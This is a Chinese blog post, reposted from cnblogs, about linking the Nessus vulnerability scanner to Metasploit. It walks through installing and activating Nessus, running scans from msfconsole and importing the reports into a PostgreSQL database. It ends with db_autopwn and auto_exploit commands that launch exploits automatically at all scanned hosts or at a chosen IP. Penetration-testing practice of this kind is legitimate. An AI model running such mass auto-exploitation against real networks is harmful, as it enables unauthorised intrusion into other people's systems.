metasploitnessus & db

mac2022-06-30  123

nessus官网:https://www.tenable.com/products/nessus-vulnerability-scanner

下载地址:https://www.tenable.com/products/nessus/select-your-operating-system

 安装

启动nessusd服务:sudo service nessusd start

访问:https://localhost:8834

设置登录的用户名/密码

此时会提示注册激活码,地址:http://www.tenable.com/products/nessus-home

从邮箱中复制粘贴激活码,继续。

 登录

msf > load nessus

msf > nessus_connect nessus:nessus@192.168.1.100  连接上nessus(nessus的用户名和密码是安装过程中设置的,这里我设置的都是nessus)

msf > nessus_user_add <username> <password>   添加一个nessus用户 

把test用户提升为adminmsf > nessus_admin

msf > nessus_user_list 查看用户列表msf > nessus_policy_list 选择一种扫描规则

ID Name Comments— —- ——–-1 Prepare for PCI-DSS audits (section 11.2.2)-2 Web App Tests-3 External Network Scan-4 Internal Network Scanmsf > nessus_scan_new

[*] Usage:[*] nessus_scan_new <policy id> <scan name> <targets>[*] use nessus_policy_list to list all available policies

msf > nessus_scan_new -2 testabc 192.168.1.100 新建扫描任务msf > nessus_scan_status 查看扫描状态msf > nessus_report_list 查看扫描报告列表msf > nessus_report_list uid 查询指定扫描报告详细msf > nessus_report_host_ports IP uid 列出指定IP的扫描结果msf > nessus_report_host_detail IP 端口 tcp uid查看指定IP地址指定端口扫描详细结果msf > nessus_report_get 导入一个扫描报告msf > hosts -c address,os_name,os_flavor,os_sp,vulns 查看扫描结果msf > vulns 查看扫描到的主机漏洞

用auto_exploit进行批量溢出开启postgresql 创建一个数据库root@bt:# service postgresql startroot@bt:~# psql -U postgres -h localhost输入 “help” 来获取帮助信息.postgres=# CREATE DATABASE testabc;CREATE DATABASEpostgres=#

msf > db_status msf连接postgresqlmsf > db_connect postgres:123456@localhost:5432/testabcmsf > nessus_report_list 查看nessus报告 并导入一个报告msf > load auto_exploit 加载auto_exploit,执行vuln_exploit溢出

msf > load db_autopwn

msf > db_autopwn -t -p -e(自动工具所有的ip)

msf > db_autopwn -t -p -I ip -e(攻击指定的ip主机) 

 

参考链接:

  http://darkoperator.squarespace.com/blog/?currentPage=10

转载于:https://www.cnblogs.com/ssooking/p/6076864.html

相关资源:db_autopwn.rb
最新回复(0)